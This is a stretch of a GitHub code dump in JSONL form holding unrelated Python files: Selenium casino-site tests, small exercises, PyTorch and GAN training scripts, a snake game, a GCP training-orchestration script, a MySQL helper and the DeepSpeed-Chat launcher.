self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"tablegametablocator\"] )\n except: \n raise Exception(\"tablegametablocator is not accessable\")\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"videopokerlocator\"] )\n except: \n raise Exception(\"videopokerlocator is not accessable\")\n try:\n \n self.wait_for_element_visibility(10,\"cssSelector\",CasinoPageMapXpath[\"searchcasinoLocator\"] )\n except: \n raise Exception(\"searchcasinolocator is not accessable\")\n try:\n\n self.wait_for_element_visibility(10, \"cssSelector\", LogInPageMap[\"LoginButtonTop\"])\n except:\n raise Exception(\"LogInPageMap is not accessable\")\n \n def newgames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"newgameLocator\"]\n )\n \n def populargames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"popularLocator\"]\n ) \n def jackpotgames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"jackpotsLcoator\"]\n )\n \n def slotgames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"slotgameLcoator\"]\n ) \n def tablegames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"tablegametablocator\"]\n )\n def videopokergames(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"videopokerlocator\"]\n )\n\n def livecasinolink(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"liveDealer\"]\n )\n\n def searchcasinolink(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"searchcasinoLocator\"]\n ) \n def submit_request_search(self,testitem):\n self.fill_out_field(\"cssSelector\",\n CasinoPageMapXpath['searchcasinoLocator'],\n testitem\n )\n return self \n def verifygamExisting(self,testitem2):\n try:\n self.find_element(\"cssSelector\", SearchResult[testitem2])\n except:\n raise Exception(testitem2 +\" is not displayed\")\n\n def click_logintop_button(self):\n self.click(10,\n \"cssSelector\",\n LogInPageMap['LoginButtonTop'])\n mainWindowHandle = self.driver.window_handles\n self.click(10,\n \"xpath\",\n LogInPageMap['LogInToMatchbookTextXpath']\n )\n allWindowHandles = self.driver.window_handles\n for handle in allWindowHandles:\n if handle != mainWindowHandle[0]:\n self.switch_to_window(handle)\n break\n log_obj = MatchBookLoginPage(self.driver,\n Casino_Constants['CAsino_Username'],\n Casino_Constants['Casino_Password']\n )\n log_obj.login()\n try:\n self.wait_for_element_visibility(10, \"cssSelector\", HomePageMapXpath[\"rhsaccount\"])\n element = self.find_element(\"cssSelector\", HomePageMapXpath[\"rhsaccount\"])\n element.click()\n self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"Usernametitle\"])\n element = self.find_element(\"cssSelector\", CasinoPageMapXpath[\"Usernametitle\"])\n text1 = element.get_attribute('innerText')\n print(text1)\n if(text1==Casino_Constants[\"CAsino_Username\"]):\n print(\"Successful Log in\")\n except:\n print(\" user name is not displayed will try usernamebonus too\")\n\n try:\n self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"bonususernametitle\"])\n element = self.find_element(\"cssSelector\", CasinoPageMapXpath[\"bonususernametitle\"])\n text1 = element.get_attribute('innerText')\n print(text1)\n if(text1==Casino_Constants[\"CAsino_Username\"]):\n print(\"Successful Log in\")\n except:\n print(\" user name has not assigned bonus yet\")\n\n","repo_name":"dtahouri775/August24","sub_path":"CasinoAuto/Pages/CasinoPage.py","file_name":"CasinoPage.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28377891695","text":"# Fibonacci Fácil\nseq = int(input())\ndic = {0:0, 1:1, 2:1}\nfibonacci = []\n\nfor valor in range(seq):\n if valor <= 2:\n fibonacci.append(dic[valor])\n else:\n fibonacci.append(fibonacci[-1] + fibonacci[-2])\n \nprint(*fibonacci) \n \n\n","repo_name":"joaogui745/URI-Online-Judge","sub_path":"Python 3/1151 - Fibonacci Fácil.py","file_name":"1151 - Fibonacci Fácil.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26975575867","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom utils.fmodule import FModule, get_module_from_model\nimport utils.fmodule as fmodule\nimport numpy as np\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n m.bias.data.fill_(0.01)\n \ndef get_ultimate_layer(model: nn.Module):\n penul = get_module_from_model(model)[-1]._parameters['weight']\n return penul\n\nclass FeatureExtractor(FModule):\n def __init__(self, output_dim = 512):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=2)\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=2)\n self.fc1 = nn.Linear(3136, output_dim)\n self.apply(init_weights)\n \n def forward(self, x):\n \"\"\"\n This function returns the representation of x\n \"\"\"\n x = x.view((x.shape[0],28,28))\n x = x.unsqueeze(1)\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, x.shape[1] * x.shape[2] * x.shape[3])\n r_x = F.relu(self.fc1(x))\n r_x = r_x / torch.norm(r_x, dim=1, keepdim=True)\n return r_x\n \nclass Classifier(FModule): \n def __init__(self, input_dim = 512, output_dim = 10):\n super().__init__()\n self.fc2 = nn.Linear(input_dim, output_dim)\n self.apply(init_weights)\n \n def forward(self, r_x):\n \"\"\"\n This function returns the logits of r_x\n \"\"\"\n l_x = self.fc2(r_x)\n return l_x\n \nclass MaskGenerator(FModule):\n def __init__(self, input_dim = 100, mid_dim = 128, output_dim = 10):\n super().__init__()\n self.fc3 = nn.Linear(input_dim, mid_dim)\n self.fc4 = nn.Linear(mid_dim, output_dim)\n self.apply(init_weights)\n \n def forward(self, r_x):\n \"\"\"\n This function generate a mask's diagonal vector for each element in r_x,\n returning shape of b x 10\n \"\"\"\n dm_x = F.relu(self.fc3(r_x))\n dm_x = torch.softmax(self.fc4(dm_x), dim=1)\n dm_x = dm_x.view(r_x.shape[0], 10)\n return dm_x\n ","repo_name":"AIoT-Lab-BKAI/Hung-NN-verifiedFL","sub_path":"utils/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23211547809","text":"import argparse\nimport os\nimport numpy as np\nimport math\n\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport visdom\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom dataset import Dataset\nimport GAN\nimport utils\n\nos.makedirs(\"images\", exist_ok=True)\n\nopt = utils.get_args()\nprint(opt)\n\nimg_shape = (opt.channels, opt.img_size, opt.img_size)\n\ncuda = True if torch.cuda.is_available() else False\n\n# Loss function\nadversarial_loss = torch.nn.BCELoss()\n\n# Initialize generator and discriminator\ngenerator = GAN.Generator(opt.latent_dim, img_shape)\ndiscriminator = GAN.Discriminator(img_shape)\n\nif cuda:\n generator.cuda()\n discriminator.cuda()\n adversarial_loss.cuda()\n\n# Configure data loader\nos.makedirs(\"../../data/mnist\", exist_ok=True)\n\ndata_dirs = [\"./MTFL/AFLW\", \"./MTFL/lfw_5590\", \"./MTFL/net_7876\"]\ndataset = Dataset(data_dirs)\n\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batch_size, shuffle=True)\n\n# Optimizers\noptimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\noptimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nif opt.if_visual:\n vis = visdom.Visdom(env='mygan')\n\n# ----------\n# Training\n# ----------\n\nfor epoch in range(opt.n_epochs):\n for i, imgs in enumerate(dataloader):\n\n # Adversarial ground truths\n valid = Variable(Tensor(imgs.size(0), 1).fill_(1.0), requires_grad=False)\n fake = Variable(Tensor(imgs.size(0), 1).fill_(0.0), requires_grad=False)\n\n # Configure input\n real_imgs = Variable(imgs.type(Tensor))\n\n # -----------------\n # Train Generator\n # -----------------\n\n optimizer_G.zero_grad()\n\n # Sample noise as generator input\n z = Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))))\n\n # Generate a batch of images\n gen_imgs = generator(z)\n\n # Loss measures generator's ability to fool the discriminator\n g_loss = adversarial_loss(discriminator(gen_imgs), valid)\n\n g_loss.backward()\n optimizer_G.step()\n\n # ---------------------\n # Train Discriminator\n # ---------------------\n\n optimizer_D.zero_grad()\n\n # Measure discriminator's ability to classify real from generated samples\n real_loss = adversarial_loss(discriminator(real_imgs), valid)\n fake_loss = adversarial_loss(discriminator(gen_imgs.detach()), fake)\n d_loss = (real_loss + fake_loss) / 2\n\n d_loss.backward()\n optimizer_D.step()\n\n print(\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch, opt.n_epochs, i, len(dataloader), d_loss.item(), g_loss.item())\n )\n\n x = torch.Tensor([epoch+0.003*i])\n y_d_loss = torch.Tensor([d_loss.item()])\n y_g_loss = torch.Tensor([g_loss.item()])\n y_sum_loss = torch.Tensor([d_loss.item() + g_loss.item()])\n vis.line(X=x, Y=y_d_loss, win=\"dloss\", update='append', opts={'title': 'y=d_loss'})\n vis.line(X=x, Y=y_g_loss, win=\"gloss\", update='append', opts={'title': 'y=g_loss'})\n vis.line(X=x, Y=y_sum_loss, win=\"d_g_loss\", update='append', opts={'title': 'y=sum_loss'})\n\n if epoch % opt.save_interval == 0:\n torch.save({\n 'epoch': epoch,\n 'generator_state_dict': generator.state_dict(),\n 'discriminator_state_dict': discriminator.state_dict(),\n 'generator_optimizer': optimizer_G.state_dict(),\n 'discriminator_optimizer': optimizer_D.state_dict(),\n }, \"save/face_model_%d.pkl\" % epoch)\n\n batches_done = epoch * len(dataloader) + i\n if batches_done % opt.sample_interval == 0:\n save_image(gen_imgs.data[:25], \"images/%d.png\" % batches_done, nrow=5, normalize=True)\n","repo_name":"zcoo/face_gan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44189730530","text":"from turtle import Screen, Turtle\r\nfrom snake import Snake\r\nimport time\r\nfrom food import Food\r\n\r\n\r\ndef create_scoreboard(turtles2, score):\r\n turtles2.penup()\r\n turtles2.hideturtle()\r\n turtles2.goto(0, 450)\r\n turtles2.color(\"red\")\r\n turtles2.write(f\"Score is {score}\", font=(\"Verdana\", 20, \"normal\"), align=\"center\")\r\n\r\n\r\ndef add_to_scoreboard(turtles2, score):\r\n turtles2.clear()\r\n turtles2.write(f\"Score is {score}\", font=(\"Verdana\", 20, \"normal\"), align=\"center\")\r\n\r\n\r\ndef main():\r\n screen = Screen()\r\n screen.setup(width=950, height=950)\r\n screen.bgcolor(\"black\")\r\n screen.title(\"My Snake Game-by Squid\")\r\n screen.tracer(0) # Turn turtle animation on/off and set delay for update drawings.\r\n\r\n snake1 = Snake() # call initialize snake function and save the list of turtle names\r\n food1 = Food()\r\n score1 = 0\r\n scoreboard1 = Turtle()\r\n create_scoreboard(scoreboard1, score1)\r\n\r\n screen.listen() # want to \"listen\" for arrow keys\r\n screen.onkey(snake1.move_up, \"Up\")\r\n screen.onkey(snake1.move_down, \"Down\")\r\n screen.onkey(snake1.move_left, \"Left\")\r\n screen.onkey(snake1.move_right, \"Right\")\r\n\r\n game_on = True\r\n while game_on:\r\n screen.update() # signals screen to update since with tracer set to zero it wont on its own\r\n time.sleep(0.1) # set a delay here by amount in sleep function call\r\n snake1.move_forward()\r\n\r\n if food1.distance(snake1.turt_list[0]) <= 15: # detect a collision between snake and food\r\n score1 += 1\r\n print(F\"Collision! +1 to your score. Score is now: {score1}\")\r\n food1.move_rand()\r\n snake1.add_snake()\r\n add_to_scoreboard(scoreboard1, score1)\r\n if snake1.turt_list[0].xcor() > 500 or snake1.turt_list[0].xcor() < -500 or snake1.turt_list[0].ycor() > 500 or snake1.turt_list[0].ycor() < -500:\r\n game_on = False\r\n print(\"You hit a wall, game over\")\r\n for i in range(1, len(snake1.turt_list) - 1): # see if snake hits any turtle in snake except first one\r\n if snake1.turt_list[0].distance(snake1.turt_list[i]) <= 15:\r\n game_on = False\r\n print(\"You hit the snake, game over\")\r\n\r\n print(f\"Your final score is {score1}\")\r\n screen.exitonclick()\r\n\r\n\r\nmain()\r\n","repo_name":"reya01/Snake_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7299084063","text":"import os\nimport argparse\nimport json\nimport threading\nimport os.path\nfrom os import path\nimport time\nimport subprocess\nimport socket\nfrom queue import *\nimport random\n\nfrom logger import logger\nfrom env_vars import *\n\n# run one iteration of training\n#\n\nos.chdir(PROJECT_ROOT)\n\nwith open('gcp_config.json') as json_file:\n data = json.load(json_file)\n assert('num_leaves' in data)\n NUM_LEAVES = data['num_leaves']\n assert('run_id' in data)\n RUN_ID = data['run_id']\n assert('zone' in data)\n GCP_ZONE = data['zone']\n\ndef ScpFromLeaf(leaf_id, remote_filename, local_filename):\n assert(0 <= leaf_id and leaf_id < NUM_LEAVES)\n retry_cnt = 0\n cmd = 'gcloud beta compute --project edgect-1155 scp indigo-%s-leaf%d:%s %s --zone %s' % (RUN_ID, leaf_id, remote_filename, local_filename, GCP_ZONE)\n while True:\n exit_code = os.system(cmd)\n if exit_code == 256:\n # scp failed with some small probablity\n # just retry in this case\n retry_cnt += 1\n logger.warning('***WARN*** ssh failed, retrying.. leaf_id = %d, cnt = %d' % (leaf_id, retry_cnt))\n if retry_cnt > 10:\n break\n time.sleep(retry_cnt)\n else:\n break\n return exit_code\n\n\t\ndef ExecuteOnLeaf(leaf_id, command):\n assert(0 <= leaf_id and leaf_id < NUM_LEAVES)\n retry_cnt = 0\n cmd = 'gcloud beta compute --project edgect-1155 ssh --zone %s indigo-%s-leaf%d -- \"%s\"' % (GCP_ZONE, RUN_ID, leaf_id, command)\n while True:\n exit_code = os.system(cmd)\n if exit_code == 65280:\n # ssh failed with some small probablity\n # just retry in this case\n retry_cnt += 1\n logger.warning('***WARN*** ssh failed, retrying.. leaf_id = %d, cnt = %d' % (leaf_id, retry_cnt))\n if retry_cnt > 10:\n break\n time.sleep(retry_cnt)\n else:\n break\n return exit_code\n\nclass AsyncRunOnLeaf(threading.Thread):\n def __init__(self, leaf_id, fn):\n threading.Thread.__init__(self)\n self.fn = fn\n self.leaf_id = leaf_id\n self.daemon = True\n self.exit_code = -1\n\t\t\n def run(self):\n self.exit_code = self.fn(self.leaf_id)\n\t\ndef ExecuteOnAllLeaves(fn):\n threads = []\n for i in range(0, NUM_LEAVES):\n threads.append(AsyncRunOnLeaf(i, fn))\n threads[i].start()\n\t\n for i in range(0, NUM_LEAVES):\n threads[i].join()\n\t\n for i in range(0, NUM_LEAVES):\n assert(threads[i].exit_code == 0)\n\t\t\nos.chdir(PROJECT_ROOT + '/' + MODEL_REPO_NAME)\n\n# discard all changes from maybe failed previous iteration\n#\nexit_code = os.system('git reset --hard')\nassert(exit_code == 0) \n\n# read version number\n#\nwith open('version') as f:\n values = f.read().splitlines()\n assert(len(values) == 1)\n VERSION = int(values[0])\n assert(VERSION >= 0)\n\nos.chdir(PROJECT_ROOT)\n\nlogger.info('****** Training on model version %d ******' % VERSION)\n\ndef leaf_init(leaf_id):\n return ExecuteOnLeaf(leaf_id, 'cd %s/%s && git pull && git checkout %s && [ \\'0\\' == \\\\\"\\\\$(cat version)\\\\\" ] || (echo \\'Wrong version:\\' && cat version && false) && sudo insmod indigo.ko' % (TRAIN_REPO_NAME, MODEL_REPO_NAME, RUN_ID))\n\ndef leaf_update(leaf_id):\n return ExecuteOnLeaf(leaf_id, 'cd %s/%s && sudo rmmod indigo.ko && git pull && [ \\'%d\\' == \\\\\"\\\\$(cat version)\\\\\" ] || (echo \\'Wrong version:\\' && cat version && false) && sudo insmod indigo.ko' % (TRAIN_REPO_NAME, MODEL_REPO_NAME, VERSION))\n\t\nif (VERSION == 0):\n # for the first iteration, let the leaves pull the repo, checkout correct branch, and insmod\n ExecuteOnAllLeaves(leaf_init)\nelse:\n # for later iterations, just rmmod, pull the repo, and insmod\n ExecuteOnAllLeaves(leaf_update)\n\t\nlogger.info('****** All leaves updated LKM successfully, distributing tasks to leaves ******')\n\n# OK if exists\nos.system('mkdir training_data')\n\n# OK if not exist\nos.system('rm -rf training_data/%d' % VERSION)\n\nexit_code = os.system('mkdir training_data/%d' % VERSION)\nassert(exit_code == 0)\n\nq = Queue()\n\ndef collect_sample(leaf_id, task):\n task_id = task[0]\n repeat_id = task[1]\n exit_code = ExecuteOnLeaf(leaf_id, 'cd %s && python3 collect_data.py --task %d' % (TRAIN_REPO_NAME, task_id))\n if (exit_code != 0):\n logger.error('***ERR*** collect_data.py failed with exit code %d' % exit_code)\n return exit_code\n \n exit_code = ScpFromLeaf(leaf_id, '%s/training_output.npz' % TRAIN_REPO_NAME, 'training_data/%d/%d_%d.npz' % (VERSION, task_id, repeat_id))\n if (exit_code != 0):\n logger.error('***ERR*** scp failed with exit code %d' % exit_code)\n return exit_code\n \n return 0\n \ndef leaf_fn(leaf_id):\n ret = 0\n while True:\n item = q.get()\n if item is None:\n break\n exit_code = collect_sample(leaf_id, item)\n if (exit_code != 0):\n logger.error('***ERR*** Command failed with exit code %d! Leaf id: %d, item %s' % (exit_code, leaf_id, str(item)))\n ret = exit_code\n q.task_done()\n return ret\n \nwith open('workloads/config.json') as json_file:\n tasks_json = json.load(json_file) \n\nall_tasks = []\nfor i in range(0, len(tasks_json)):\n task = tasks_json[i]\n assert('repeats' in task)\n repeats = task['repeats']\n for k in range(0, repeats):\n all_tasks.append([i, k])\n \nrandom.shuffle(all_tasks)\n\nthreads = []\nfor i in range(0, NUM_LEAVES):\n threads.append(AsyncRunOnLeaf(i, leaf_fn))\n threads[i].start()\n\nfor item in all_tasks:\n q.put(item)\n\nq.join()\n\nfor i in range(0, NUM_LEAVES):\n q.put(None)\n\nfor i in range(0, NUM_LEAVES):\n threads[i].join()\n\nfor i in range(0, NUM_LEAVES):\n assert(threads[i].exit_code == 0)\n \nlogger.info('****** All leaf tasks completed successfully, training model ******')\n\nstart_time = time.time()\n\nexit_code = os.system('python3 run_trainer.py')\nassert(exit_code == 0)\n\nend_time = time.time()\n\nlogger.info('****** Training complete in %f sec, building .pb file ******' % (float(end_time - start_time)))\n\nexit_code = os.system('python3 build_pb_file.py')\nassert(exit_code == 0)\n\nlogger.info('****** .pb file build complete, building LKM file ******')\n\nexit_code = os.system('python3 build_lkm_file.py')\nassert(exit_code == 0)\n\nlogger.info('****** LKM file build complete, incrementing model version to %d and committing model ******' % (VERSION + 1))\n\nexit_code = os.system('echo \"%d\" > %s/version' % (VERSION + 1, MODEL_REPO_NAME))\nassert(exit_code == 0)\n\nexit_code = os.system('python3 commit_model.py')\nassert(exit_code == 0)\n\nlogger.info('****** Training on model version %d complete, now model version is incremented to %d ******' % (VERSION, VERSION + 1))\n\n","repo_name":"sillycross/indigo-trainer","sub_path":"run_one_iteration.py","file_name":"run_one_iteration.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28573715624","text":"import sys\nimport unittest\nfrom unittest import TestCase\n\nfrom simplejson import encoder, scanner\n\n\ndef has_speedups():\n return encoder.c_make_encoder is not None\n\n\ndef skip_if_speedups_missing(func):\n def wrapper(*args, **kwargs):\n if not has_speedups():\n if hasattr(unittest, 'SkipTest'):\n raise unittest.SkipTest(\"C Extension not available\")\n else:\n sys.stdout.write(\"C Extension not available\")\n return\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass TestDecode(TestCase):\n @skip_if_speedups_missing\n def test_make_scanner(self):\n self.assertRaises(AttributeError, scanner.c_make_scanner, 1)\n\n @skip_if_speedups_missing\n def test_make_encoder(self):\n self.assertRaises(\n TypeError,\n encoder.c_make_encoder,\n None,\n (\"\\xCD\\x7D\\x3D\\x4E\\x12\\x4C\\xF9\\x79\\xD7\"\n \"\\x52\\xBA\\x82\\xF2\\x27\\x4A\\x7D\\xA0\\xCA\\x75\"),\n None\n )\n","repo_name":"ryfeus/lambda-packs","sub_path":"Selenium_PhantomJS/source/simplejson/tests/test_speedups.py","file_name":"test_speedups.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1104,"dataset":"github-code","pt":"22"} +{"seq_id":"23974714265","text":"import pymysql\n\n\nclass SQLdb:\n def __init__(self):\n self.dataBase = pymysql.connect(host=\"localhost\", port=3306, user=\"root\", password=\"150492\", db=\"test\")\n self.cursor = self.dataBase.cursor()\n\n\n def insert(self, table, id, name, cost):\n query = \"INSERT INTO %s(id,name,cost) VALUES(%d,\\\"%s\\\",\\\"%s\\\")\" % (table, id, name, cost)\n try:\n self.cursor.execute(query)\n self.dataBase.commit()\n\n except Exception:\n print(Exception)\n self.dataBase.rollback()\n\n finally:\n self.dataBase.close()\n\n def update(self, table, id, column, newValue):\n query = \"UPDATE %s SET %s = %s WHERE id = %d\" % (table, column, newValue, id)\n try:\n self.cursor.execute(query)\n self.dataBase.commit()\n\n except Exception:\n print(Exception)\n self.dataBase.rollback()\n\n finally:\n self.dataBase.close()\n\n def delete(self, table, column, key):\n query = \"DELETE FROM %s WHERE %s = \\\"%s\\\"\" % (table, column, key)\n try:\n self.cursor.execute(query)\n self.dataBase.commit()\n\n except Exception:\n print(Exception)\n self.dataBase.rollback()\n\n finally:\n self.dataBase.close()\n\ndb = SQLdb()\ndb.delete('items', 'id', '7777')\n\n\n","repo_name":"idoFinder/Festivow_4","sub_path":"SQLdb.py","file_name":"SQLdb.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40361779830","text":"import argparse\nimport warnings\nimport subprocess\nimport os\nimport datetime\nimport time\n\nstep_dirs = {\n 1: \"training/step1_supervised_finetuning\",\n 2: \"training/step2_reward_model_finetuning\",\n 3: \"training/step3_rlhf_finetuning\",\n}\nmodel_type = {1: \"actor\", 2: \"reward\", 3: \"step3\"}\ndse_url = \"https://github.com/microsoft/DeepSpeedExamples/tree/master/applications/DeepSpeed-Chat/\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--step\",\n type=int,\n nargs=\"+\",\n choices=(1, 2, 3),\n default=(1, 2, 3),\n help=\"Which steps of the ChatGPT example to run\",\n )\n parser.add_argument(\n \"--actor-model\",\n type=lambda x: x.replace(\"facebook/opt-\", \"\"),\n default=\"1.3b\",\n choices=(\"1.3b\", \"6.7b\", \"13b\", \"66b\"),\n help=\"Which facebook/opt-* model to use for Actor (step 1)\",\n )\n parser.add_argument(\n \"--reward-model\",\n type=lambda x: x.replace(\"facebook/opt-\", \"\"),\n default=\"350m\",\n choices=(\"350m\"),\n help=\"Which facebook/opt-* model to use for Reward (step 2)\",\n )\n parser.add_argument(\n \"--actor-zero-stage\",\n type=str,\n default=\"\",\n choices=(\"\", \"0\", \"1\", \"2\", \"3\"),\n help=\"ZeRO stage for step 1 (Actor) training\",\n )\n parser.add_argument(\n \"--reward-zero-stage\",\n type=str,\n default=\"\",\n choices=(\"\", \"0\", \"1\", \"2\", \"3\"),\n help=\"ZeRO stage for step 2 (Critic) training\",\n )\n parser.add_argument(\n \"--output-dir\",\n type=lambda x: os.path.abspath(x),\n default=\"./output\",\n help=\"Directory for output of each step\",\n )\n parser.add_argument(\n \"--deployment-type\",\n type=str,\n default=\"single_gpu\",\n choices=(\"single_gpu\", \"single_node\", \"multi_node\"),\n help=\"Number of GPUs to run the actor/reward models on\",\n )\n args = parser.parse_args()\n\n if args.actor_zero_stage != \"\" or args.reward_zero_stage != \"\":\n warnings.warn(\n \"Non-default zero stages may result in OOM errors or worse performance.\"\n )\n\n return args\n\n\ndef get_model_size(args, step_num):\n if step_num == 3:\n return get_model_size(args, 1)\n return getattr(args, f\"{model_type[step_num]}_model\")\n\n\ndef get_zero_stage(args, step_num):\n return getattr(args, f\"{model_type[step_num]}_zero_stage\")\n\n\ndef get_output_dir(args, step_num):\n model_size = get_model_size(args, step_num)\n output_dir = os.path.join(args.output_dir,\n f\"{model_type[step_num]}-models\",\n f\"{model_size}\")\n return output_dir\n\n\ndef get_script(args, step_num):\n model_size = get_model_size(args, step_num)\n script = os.path.join(\n os.getcwd(),\n step_dirs[step_num],\n \"training_scripts/opt/\",\n args.deployment_type,\n f\"run_{model_size}.sh\",\n )\n assert os.path.isfile(\n script\n ), f\"{script} does not exist.\\n\\n Use examples in {os.path.dirname(script)} as a template.\"\n\n return script\n\n\ndef verify_model(args, step_num):\n output_dir = get_output_dir(args, step_num)\n model_size = get_model_size(args, step_num)\n model_file = os.path.join(output_dir, \"pytorch_model.bin\")\n if not os.path.isfile(model_file):\n error_str = f\"Step {step_num} model has not been trained. Train it with:\\n\"\n error_str += f\"python3 train.py --step {step_num}\"\n error_str += f\" --{model_type[step_num]}-model {model_size}\"\n raise RuntimeError(error_str)\n\n\ndef get_cmd(args, step_num):\n output_dir = get_output_dir(args, step_num)\n script = get_script(args, step_num)\n\n if step_num in (1, 2):\n zero_stage = get_zero_stage(args, step_num)\n cmd = f\"bash {script} {output_dir} {zero_stage}\"\n if step_num == 3:\n verify_model(args, 1) # Verify step 1 model exists\n verify_model(args, 2) # Verify step 2 model exists\n s1_dir, s1_zs = get_output_dir(args, 1), get_zero_stage(args, 1)\n s2_dir, s2_zs = get_output_dir(args, 2), get_zero_stage(args, 2)\n cmd = f\"bash {script} {s1_dir} {s2_dir} '{s1_zs}' '{s2_zs}' {output_dir}\"\n\n return cmd\n\n\ndef launch_cmd(args, step_num, cmd):\n working_dir = step_dirs[step_num]\n print(f\"Running:\\n{cmd}\")\n p = subprocess.Popen(cmd, cwd=working_dir, shell=True)\n p.wait()\n if p.returncode != 0:\n raise RuntimeError('\\n\\n'.join((\n f\"Step {step_num} exited with non-zero status {p.returncode}\",\n f\"Launch command: {cmd}\",\n f\"Log output: {os.path.join(get_output_dir(args, step_num), 'training.log')}\",\n f\"Please see our tutorial at {dse_url}{step_dirs[step_num]}\",\n \"Please check that you have installed our requirements: `pip install -r requirements.txt`\",\n f\"If you are seeing an OOM error, try modifying {get_script(args, step_num)}:\",\n \" - Reduce `--per_device_*_batch_size`\",\n \" - Increase `--zero_stage {0,1,2,3}` on multi-gpu setups\",\n \" - Enable `--gradient_checkpointing` or `--only_optimize_lora`\"\n )))\n\n\ndef main(args):\n start_time = time.time()\n for step_num in args.step:\n print(f\"---=== Running Step {step_num} ===---\")\n step_start_time = time.time()\n\n cmd = get_cmd(args, step_num)\n launch_cmd(args, step_num, cmd)\n\n step_time = int(time.time() - start_time)\n time_str = str(datetime.timedelta(seconds=step_time))\n print(f\"---=== Finished Step {step_num} in {time_str} ===---\")\n\n total_time = int(time.time() - start_time)\n time_str = str(datetime.timedelta(seconds=total_time))\n\n if len(args.step) > 1:\n print(f\"---=== Finished Steps {args.step} in {time_str} ===---\")\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n","repo_name":"microsoft/DeepSpeedExamples","sub_path":"applications/DeepSpeed-Chat/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","stars":5145,"dataset":"github-code","pt":"22"} +{"seq_id":"16127693742","text":"from random import seed\nfrom random import choice\nfrom random import randint\nfrom string import ascii_letters\nseed(1258847)\n\na = []\n\ndef random_string_generator():\n r = \"\"\n my_str = \"\"\n for e in range(1,3):\n my_str += choice(ascii_letters).lower()\n for o in range(randint(1,15)):\n idx = randint(1,len(my_str) - 1)\n r += choice(my_str)\n return r\n\n\nfor e in range(19075):\n v = random_string_generator()\n m = message_optimizer(v)\n a.append(m)\n","repo_name":"projeto-exercicios/Exercicios-Python-de-correccao-automatica","sub_path":"03_Implementacao/DataBase/true_or_false_question_message_optimizer/question/version_2/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36175424293","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom scipy.ndimage.filters import gaussian_filter1d, gaussian_filter\nfrom scipy import interpolate\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation, PillowWriter\n\nf = open('data/nvwater.txt','r')\nlines = f.readlines()\n\n#print(\"----------------------------------------------------------\")\n\ncodesRaw=lines[12786:12958]\ncodesDict={\"fields\":{}}\n\nformat=lines[12959][:-2].split(\"\\t\")\nhuh=lines[12960][:-2].split(\"\\t\")\ndata=lines[12961:278769]\n\n#print(format)\n#print(data[0][:-2].split(\"\\t\"))\n\n#print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\nkey1 = \"fields\"\n\nfor el in codesRaw:\n status=el[2:-2].split()\n if len(status)==0:\n continue\n elif status[0]==\"Referenced\":\n for elf in status[1:]:\n if elf[0]==\"(\":\n key1=elf[1:-1]##search for key in ()\n codesDict[key1]={}\n #print(key1)\n else:\n 